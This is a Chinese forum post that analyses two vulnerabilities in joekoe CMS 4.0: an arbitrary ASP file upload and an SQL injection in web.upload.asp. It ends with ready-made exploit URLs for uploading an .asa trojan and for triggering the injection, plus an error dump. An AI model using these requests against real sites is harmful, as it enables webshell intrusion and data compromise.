joekoe CMS 4.0 两个漏洞
<P>乔客(joekoe) CMS 4.0 的2个高危漏洞<BR> 前段时间读了读乔客,发现在乔客4.0版本中存在两个高危漏洞,一个上传漏</P><P>洞,可以随意上传任意文件,包括ASP,另一个是SQL注入,甚至还有返回错误信息,可</P>
<P>怕啊</P>
<P> 上传漏洞:<BR>看/common/include/web.upload.asp 中的代码</P>
<P>----------------------------------------------------------------------</P>
<P>-------------------------------------------------------------</P>
<P>sub doPageLoad()<BR>if APP_STATUS="close" then<BR> treeData.addItem "_status","error.message"<BR> treeData.addItem "_message","网站暂时因关闭维护中!请稍候..."<BR> exit sub<BR>end if<BR>up.doInit()<BR>if not upConfig.isInit then<BR> treeData.addItem "_status","error.message"<BR> treeData.addItem "_message","上传文件的参数不正确!"<BR>else<BR> doPageLoadUser()<BR> select case upConfig.channel<BR> case "forum"<BR> upConfig.setSaveDir(upConfig.getSaveDir&(left</P>
<P>(ops.time.toConvertString("",10),6)&DIR_SEPARATOR))<BR> upConfig.filename=""<BR> case "user.face"<BR> upConfig.filename="face_"&upConfig.userid<BR> upConfig.setSaveDir("face"&DIR_SEPARATOR)<BR> upConfig.filetype="gif"<BR> case "blog.logo"<BR> upConfig.setSaveDir("blog"&DIR_SEPARATOR)<BR> upConfig.filetype="gif"<BR> case else<BR> if instr(upConfig.channel,".")>0 then<BR> upConfig.setSaveDir(mid(upConfig.channel,1,instr</P>
<P>(upConfig.channel,".")-1)&DIR_SEPARATOR)<BR> end if<BR> if instr(upConfig.fileinput,"url")>0 then<BR> upConfig.filetype="affix"<BR> end if<BR> end select<BR> if len(upConfig.getSaveDir())<3 then<BR> treeData.addItem "_status","error.message"<BR> treeData.addItem "_message","上传文件的参数不正确!"<BR> exit sub<BR> end if<BR> <BR> if 1=1 then<BR> upConfig.setData "zoom.channel.width",120<BR> upConfig.setData "zoom.channel.height",90<BR> end if<BR> <BR> upConfig.setBaseDir(DIR_ROOT&DIR_UPLOAD)<BR> upConfig.setBasePath(opsDirPath(DIR_ROOT&DIR_UPLOAD))<BR> upConfig.setBaseURL(URL_UPLOAD)<BR> up.doLoad()<BR>end if<BR>end sub</P>
<P>----------------------------------------------------------------------</P>
<P>-------------------------------------------------------------</P>
<P>这段代码通过channel判断是否给上传类型赋值,如果channel不等于forum、</P>
<P>user.face、blog.logo的时候判断fileinput是否包含url,如果不包含,</P>
<P>upConfig.filetype就不赋值,继续往下看<BR>----------------------------------------------------------------------</P>
<P>--<BR> if up.isPost() then<BR> call doParseUploadData()<BR> treeData.addItem "_status","succeed"<BR> dim tmpFormMode,tmpFileValue,tmpThumbValue<BR> tmpFormMode="set"<BR> if upConfig.channel="user.face" then<BR> tmpLinkMode="no"<BR> tmpFileValue="#"&up.getFileInfo("filename")<BR> else<BR> tmpFileValue=up.getFileInfo("file.path")<BR> select case upConfig.filetype<BR> case "file"<BR> tmpLinkMode="no"<BR> 'tmpFileValue=up.getFileInfo("file.path")<BR> case "pic","spic","pics","affix","gif","jpg","jpeg","bmp","png"<BR> tmpLinkMode="no"<BR> tmpThumbValue=up.getFileInfo("thumb.path")<BR> case else<BR> tmpLinkMode="again"<BR> tmpFormMode="append"<BR> dim tmpFileType:tmpFileType=lcase(up.getFileInfo("filetype"))<BR> select case tmpFileType<BR> case "gif","jpg","jpeg","bmp","png"<BR> tmpFileValue=""<BR> case "swf"<BR> tmpFileValue=""<BR> case else<BR> tmpFileValue="upload_download.asp?</P>
<P>id="&upConfig.fileid&""<BR> end select<BR> end select<BR> end if<BR> treeData.addItem "_form.mode",tmpFormMode<BR> treeData.addItem "_form.filevalue",tmpFileValue<BR> treeData.addItem "_form.thumbvalue",tmpThumbValue<BR> end if<BR>----------------------------------------------------------------------</P>
<P>------------------------------<BR>这段代码判断upConfig.filetype,然后定义上传文件的后缀名,只要之前</P>
<P>upConfig.filetype没被赋值,且不是gif,jpg,jpeg,bmp,png,swf,就</P>
<P>tmpFileValue="upload_download.asp?</P>
<P>id="&upConfig.fileid&"",看到这个,大家眼睛都放光了,根据用</P>
<P>户的定义来判断上传类型,就好比问一个要偷东西的人:“你是贼么?”,这段</P>
<P>代码也太XX了,估计之前也有不少人读出来了,只不过没公开而已</P>
<P><BR> SQL注入漏洞<BR>还是在web.upload.asp中:<BR>----------------------------------------------------------------------</P>
<P>----------------------------------<BR>...........<BR>sub doParseUploadData()<BR>dim tmpFilePath,tmpFileType,tmpFileSize,tmpName<BR>tmpFilePath=up.getFileInfo("file.path")<BR>tmpFileType=up.getFileInfo("filetype")<BR>tmpFileSize=opsCommon.toInt(up.getFileInfo("filesize"))<BR>tmpName=up.getFileInfo("name")<BR>dim tmpChannel,tmpDataid,tmpType,tmpSQL,tmpID<BR>tmpChannel=upConfig.channel<BR>tmpDataid=0<BR>tmpType=0<BR>select case upConfig.channel<BR>case "user.face"<BR> tmpDataid=upConfig.userid<BR> tmpChannel="face"<BR> tmpType=1<BR> tmpSQL="select top 1 u_id from db_sys_upload where</P>
<P>nsort='"&tmpChannel&"' and iid="&tmpDataid&""<BR>case "blog.logo"<BR> tmpDataid=toInt(ops.client.getSession("user.blogid"))<BR> if tmpDataid<1 then tmpDataid=upConfig.userid<BR> tmpChannel="blog"<BR> tmptype=1<BR> tmpSQL="select top 1 u_id from db_sys_upload where</P>
<P>nsort='"&tmpChannel&"' and iid="&tmpDataid&""<BR>case else<BR> tmpSQL="select top 1 u_id from db_sys_upload where</P>
<P>u_url='"&tmpFilePath&"'"<BR>end select<BR>..........<BR>----------------------------------------------------------------------</P>
<P>---------------------------------------<BR>看这句tmpSQL="select top 1 u_id from db_sys_upload where</P>
<P>u_url='"&tmpFilePath&"'",u_url来自&tmpFilePath&,而&tmpFilePath&来自</P>
<P>up.getFileInfo("file.path"),呵呵,没有经过任何过滤就放到SQL查询语句里</P>
<P>面查询了。</P>
<P> </P>
<P>利用方法:<BR> 1 .上传漏洞:很好利用,把channel变量改一下,只要不等于forum、</P>
<P>user.face、blog.logo就行,然后filetype改成asa,就可以光明正大的上传木马</P>
<P>了,具体url可以这样common/upload.asp?</P>
<P>channel=use&filetype=asa&filename=&fileinput=u_face&formname=&thumbname</P>
<P>=&thumbinput=,然后上传</P>
<P> 2. SQL注入漏洞:在Channel变量中加入诸如语句,比如:</P>
<P>common/upload.asp?</P>
<P>channel=use'&filetype=gif&filename=&fileinput=u_face&formname=&thumbnam</P>
<P>e=&thumbinput=,然后上传,就会报错<BR>----------------------------------------------------------------------</P>
<P>------------------------------------------------------------</P>
<P>Joekoe CMS 4.0<BR>错误信息:<BR>select top 1 u_id from db_sys_upload where</P>
<P>u_url='user'/20070722031234c.gif'<BR>原始错误:<BR>Error #-2147217900, 第 1 行: 'c' 附近有语法错误。 Microsoft OLE DB</P>
<P>Provider for SQL Server<BR>返回首页<BR>Processed in 0.188 s, 1 queries, 54 Cache.</P>
<P>*-------------------------</P>
<P>自己试过。。上传没什么问题。。</P>
<P>后面的SQL。。好像已经没什么用了!!自己试吧</P>
<DIV></DIV>
页:
[1]